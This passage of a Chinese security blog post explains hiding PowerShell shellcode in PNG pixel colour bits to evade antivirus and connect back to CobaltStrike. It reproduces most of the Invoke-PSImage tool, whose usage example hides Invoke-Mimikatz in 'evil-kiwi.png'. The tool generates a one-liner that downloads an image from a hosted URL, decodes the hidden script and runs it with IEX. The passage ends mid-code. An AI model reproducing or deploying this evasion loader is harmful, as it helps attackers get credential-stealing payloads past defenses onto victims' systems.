<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">








<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="ZsntNucQnwgOG8NJsPVjhDxi8hx9YmTvgqa9eReuux0" />



  <meta name="msvalidate.01" content="A3C088EA1884107284C9F5B94B1C667F" />






  <meta name="baidu-site-verification" content="rLNDlRl5mo" />







  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/avatar.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/avatar.jpg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。  小维  写在前面看到一篇推文隐写RGB来进行绕过杀软，记录一下~">
<meta property="og:type" content="article">
<meta property="og:title" content="Shellcode 隐写像素RGB免杀上线到 CobaltStrike">
<meta property="og:url" content="https://scriptkid-beta.github.io/2021/04/16/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/index.html">
<meta property="og:site_name" content="小维的博客">
<meta property="og:description" content="本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。  小维  写在前面看到一篇推文隐写RGB来进行绕过杀软，记录一下~">
<meta property="og:image" content="https://scriptkid-beta.github.io/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210416092120420.png">
<meta property="og:image" content="https://scriptkid-beta.github.io/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202230131.png">
<meta property="og:image" content="https://scriptkid-beta.github.io/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415202655248.png">
<meta property="og:image" content="https://scriptkid-beta.github.io/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210415201441673.png">
<meta property="article:published_time" content="2021-04-16T10:18:58.000Z">
<meta property="article:modified_time" content="2021-06-26T09:27:54.579Z">
<meta property="article:author" content="小维同学">
<meta property="article:tag" content="Python | CTF | SEC | 笔记 | Pentest | 小维同学 | 网络安全 | 博客 | 小维 | 安全导航 | JAVA">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://scriptkid-beta.github.io/img/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/image-20210416092120420.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":10,"b2t":true,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://scriptkid-beta.github.io/2021/04/16/Shellcode 隐写像素RGB免杀上线到 CobaltStrike/"/>





  <title>Shellcode 隐写像素RGB免杀上线到 CobaltStrike | 小维的博客</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">小维的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Pentest | Note | Security</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-小维的安全导航">
          <a href="/StartPages/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            小维的安全导航
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://scriptkid-beta.github.io/2021/04/16/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="小维同学">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小维的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Shellcode 隐写像素RGB免杀上线到 CobaltStrike</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-04-16T18:18:58+08:00">
                2021-04-16
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.8k字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  10分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>

<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h4><p>看到一篇推文隐写RGB来进行绕过杀软，记录一下~</p>
<a id="more"></a>

<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h4><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">攻击机地址：<span class="number">10.10</span><span class="number">.10</span><span class="number">.2</span></span><br><span class="line">cobaltstrike v4<span class="number">.1</span></span><br><span class="line"></span><br><span class="line">VPS地址：*.*.*.*</span><br><span class="line"></span><br><span class="line">靶机系统: Windows <span class="number">10</span></span><br><span class="line">靶机地址: <span class="number">10.10</span><span class="number">.10</span><span class="number">.131</span></span><br></pre></td></tr></table></figure>

<h4 id="隐写RGB示例"><a href="#隐写RGB示例" class="headerlink" title="隐写RGB示例"></a>隐写RGB示例</h4><h5 id="Invoke-PSImage下载"><a href="#Invoke-PSImage下载" class="headerlink" title="Invoke-PSImage下载"></a>Invoke-PSImage下载</h5><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">下载地址： https:<span class="regexp">//gi</span>thub.com<span class="regexp">/dayuxiyou/</span>Invoke-PSImage</span><br></pre></td></tr></table></figure>

<p>Invoke-PSImage.ps1</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Invoke-PSImage</span></span></span><br><span class="line">&#123;</span><br><span class="line"><span class="comment">&lt;#</span></span><br><span class="line"><span class="comment"><span class="doctag">.SYNOPSIS</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Embeds a PowerShell script in an image and generates a oneliner to execute it.</span></span><br><span class="line"><span class="comment">Author:  Barrett Adams (@peewpw)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.DESCRIPTION</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">This tool can either create an image with just the target data, or can embed the payload in</span></span><br><span class="line"><span class="comment">an existing image. When embeding, the least significant 4 bits of 2 color values (2 of RGB) in</span></span><br><span class="line"><span class="comment">each pixel (for as many pixels as are needed for the payload). Image quality will suffer as</span></span><br><span class="line"><span class="comment">a result, but it still looks decent. The image is saved as a PNG, and can be losslessly</span></span><br><span class="line"><span class="comment">compressed without affecting the ability to execute the payload as the data is stored in the</span></span><br><span class="line"><span class="comment">colors themselves. It can accept most image types as input, but output will always be a PNG</span></span><br><span class="line"><span class="comment">because it needs to be lossless.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Script</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The path to the script to embed in the Image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Out</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The file to save the resulting image to (image will be a PNG)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Image</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The image to embed the script in. (optional)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER WebRequest</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Output a command for reading the image from the web using Net.WebClient.</span></span><br><span class="line"><span class="comment">You will need to host the image and insert the URL into the command.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER PictureBox</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Output a command for reading the image from the web using System.Windows.Forms.PictureBox.</span></span><br><span class="line"><span class="comment">You will need to host the image and insert the URL into the command.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.EXAMPLE</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">PS&gt;Import-Module .\Invoke-PSImage.ps1</span></span><br><span class="line"><span class="comment">PS&gt;Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg </span></span><br><span class="line"><span class="comment">   [Oneliner to execute from a file]</span></span><br><span class="line"><span class="comment">   </span></span><br><span class="line"><span class="comment">#&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="function">[<span class="type">CmdletBinding</span>()] <span class="keyword">Param</span></span> (</span><br><span class="line">        [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">0</span>, <span class="type">Mandatory</span> = <span class="variable">$True</span>)]</span><br><span class="line">        [<span class="built_in">String</span>]</span><br><span class="line">        <span class="variable">$Script</span>,</span><br><span class="line">    </span><br><span class="line">        [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">1</span>, <span class="type">Mandatory</span> = <span class="variable">$True</span>)]</span><br><span class="line">        [<span class="built_in">String</span>]</span><br><span class="line">        <span class="variable">$Out</span>,</span><br><span class="line">    </span><br><span class="line">        [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">2</span>, <span class="type">Mandatory</span> = <span class="variable">$False</span>)]</span><br><span class="line">        [<span class="built_in">String</span>]</span><br><span class="line">        <span class="variable">$Image</span>,</span><br><span class="line"></span><br><span class="line">        [<span class="type">switch</span>] <span class="variable">$WebClient</span>,</span><br><span class="line">        </span><br><span class="line">        [<span class="type">switch</span>] <span class="variable">$PictureBox</span></span><br><span class="line">    )</span><br><span class="line">    <span class="comment"># Stop if we hit an error instead of making more errors</span></span><br><span class="line">    <span class="variable">$ErrorActionPreference</span> = <span class="string">"Stop"</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Load some assemblies</span></span><br><span class="line">    [<span class="built_in">void</span>] [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span class="string">"System.Drawing"</span>)</span><br><span class="line">    [<span class="built_in">void</span>] [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span class="string">"System.Web"</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># Normalize paths beacuse powershell is sometimes bad with them.</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Script</span>))&#123;</span><br><span class="line">        <span class="variable">$Script</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Script</span>))</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Out</span>))&#123;</span><br><span class="line">        <span class="variable">$Out</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Out</span>))</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$testurl</span> = <span class="string">"http://example.com/"</span> + [<span class="type">System.IO.Path</span>]::GetFileName(<span class="variable">$Out</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Read in the script</span></span><br><span class="line">    <span class="variable">$ScriptBlockString</span> = [<span class="type">IO.File</span>]::ReadAllText(<span class="variable">$Script</span>)</span><br><span class="line">    <span class="variable">$in</span> = [<span class="type">ScriptBlock</span>]::Create(<span class="variable">$ScriptBlockString</span>)</span><br><span class="line">    <span class="variable">$payload</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$in</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$Image</span>) &#123;</span><br><span class="line">        <span class="comment"># Normalize paths beacuse powershell is sometimes bad with them.</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="operator">-Not</span> [<span class="type">System.IO.Path</span>]::IsPathRooted(<span class="variable">$Image</span>))&#123;</span><br><span class="line">            <span class="variable">$Image</span> = [<span class="type">System.IO.Path</span>]::GetFullPath((<span class="built_in">Join-Path</span> (<span class="built_in">Get-Location</span>) <span class="variable">$Image</span>))</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># Read the image into a bitmap</span></span><br><span class="line">        <span class="variable">$img</span> = <span class="built_in">New-Object</span> System.Drawing.Bitmap(<span class="variable">$Image</span>)</span><br><span class="line"></span><br><span class="line">        <span class="variable">$width</span> = <span class="variable">$img</span>.Size.Width</span><br><span class="line">        <span class="variable">$height</span> = <span class="variable">$img</span>.Size.Height</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Lock the bitmap in memory so it can be changed programmatically.</span></span><br><span class="line">        <span class="variable">$rect</span> = <span class="built_in">New-Object</span> System.Drawing.Rectangle(<span class="number">0</span>, <span class="number">0</span>, <span class="variable">$width</span>, <span class="variable">$height</span>);</span><br><span class="line">        <span class="variable">$bmpData</span> = <span class="variable">$img</span>.LockBits(<span class="variable">$rect</span>, [<span class="type">System.Drawing.Imaging.ImageLockMode</span>]::ReadWrite, <span class="variable">$img</span>.PixelFormat)</span><br><span class="line">        <span class="variable">$ptr</span> = <span class="variable">$bmpData</span>.Scan0</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Copy the RGB values to an array for easy modification</span></span><br><span class="line">        <span class="variable">$bytes</span>  = [<span class="type">Math</span>]::Abs(<span class="variable">$bmpData</span>.Stride) * <span class="variable">$img</span>.Height</span><br><span class="line">        <span class="variable">$rgbValues</span> = <span class="built_in">New-Object</span> byte[] <span class="variable">$bytes</span>;</span><br><span class="line">        [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$ptr</span>, <span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$bytes</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Check that the payload fits in the image </span></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$bytes</span>/<span class="number">2</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length) &#123;</span><br><span class="line">            <span class="built_in">Write-Error</span> <span class="string">"Image not large enough to contain payload!"</span></span><br><span class="line">            <span class="variable">$img</span>.UnlockBits(<span class="variable">$bmpData</span>)</span><br><span class="line">            <span class="variable">$img</span>.Dispose()</span><br><span class="line">            <span class="keyword">Break</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Generate a random string to use to fill other pixel info in the picture.</span></span><br><span class="line">        <span class="comment"># (Calling get-random everytime is too slow)</span></span><br><span class="line">        <span class="variable">$randstr</span> = [<span class="type">System.Web.Security.Membership</span>]::GeneratePassword(<span class="number">128</span>,<span class="number">0</span>)</span><br><span class="line">        <span class="variable">$randb</span> = [<span class="type">system.Text.Encoding</span>]::ASCII.GetBytes(<span class="variable">$randstr</span>)</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># loop through the RGB array and copy the payload into it</span></span><br><span class="line">        <span class="keyword">for</span> (<span class="variable">$counter</span> = <span class="number">0</span>; <span class="variable">$counter</span> <span class="operator">-lt</span> (<span class="variable">$rgbValues</span>.Length)/<span class="number">3</span>; <span class="variable">$counter</span>++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$counter</span> <span class="operator">-lt</span> <span class="variable">$payload</span>.Length)&#123;</span><br><span class="line">                <span class="variable">$paybyte1</span> = [<span class="type">math</span>]::Floor(<span class="variable">$payload</span>[<span class="variable">$counter</span>]/<span class="number">16</span>)</span><br><span class="line">                <span class="variable">$paybyte2</span> = (<span class="variable">$payload</span>[<span class="variable">$counter</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line">                <span class="variable">$paybyte3</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">2</span>)%<span class="number">109</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$paybyte1</span> = (<span class="variable">$randb</span>[<span class="variable">$counter</span>%<span class="number">113</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line">                <span class="variable">$paybyte2</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">1</span>)%<span class="number">67</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line">                <span class="variable">$paybyte3</span> = (<span class="variable">$randb</span>[(<span class="variable">$counter</span>+<span class="number">2</span>)%<span class="number">109</span>] <span class="operator">-band</span> <span class="number">0</span>x0f)</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte1</span></span><br><span class="line">            <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">1</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">1</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte2</span></span><br><span class="line">            <span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">2</span>)] = (<span class="variable">$rgbValues</span>[(<span class="variable">$counter</span>*<span class="number">3</span>+<span class="number">2</span>)] <span class="operator">-band</span> <span class="number">0</span>xf0) <span class="operator">-bor</span> <span class="variable">$paybyte3</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Copy the array of RGB values back to the bitmap</span></span><br><span class="line">        [<span class="type">System.Runtime.InteropServices.Marshal</span>]::Copy(<span class="variable">$rgbValues</span>, <span class="number">0</span>, <span class="variable">$ptr</span>, <span class="variable">$bytes</span>)</span><br><span class="line">        <span class="variable">$img</span>.UnlockBits(<span class="variable">$bmpData</span>)</span><br><span class="line"></span><br><span class="line">        <span class="comment"># Write the image to a file</span></span><br><span class="line">        <span class="variable">$img</span>.Save(<span class="variable">$Out</span>, [<span class="type">System.Drawing.Imaging.ImageFormat</span>]::Png)</span><br><span class="line">        <span class="variable">$img</span>.Dispose()</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># Get a bunch of numbers we need to use in the oneliner</span></span><br><span class="line">        <span class="variable">$rows</span> = [<span class="type">math</span>]::Ceiling(<span class="variable">$payload</span>.Length/<span class="variable">$width</span>)</span><br><span class="line">        <span class="variable">$array</span> = (<span class="variable">$rows</span>*<span class="variable">$width</span>)</span><br><span class="line">        <span class="variable">$lrows</span> = (<span class="variable">$rows</span><span class="literal">-1</span>)</span><br><span class="line">        <span class="variable">$lwidth</span> = (<span class="variable">$width</span><span class="literal">-1</span>)</span><br><span class="line">        <span class="variable">$lpayload</span> = (<span class="variable">$payload</span>.Length<span class="literal">-1</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$WebClient</span>) &#123;</span><br><span class="line">            <span class="variable">$pscmd</span> = <span class="string">"sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(`"<span class="variable">$testurl</span>`"));`$o=a Byte[] <span class="variable">$array</span>;(0..<span class="variable">$lrows</span>)|%&#123;foreach(`$x in(0..<span class="variable">$lwidth</span>))&#123;`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*<span class="variable">$width</span>+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))&#125;&#125;;IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..<span class="variable">$lpayload</span>]))"</span></span><br><span class="line">        &#125; <span class="keyword">elseif</span>(<span class="variable">$PictureBox</span>) 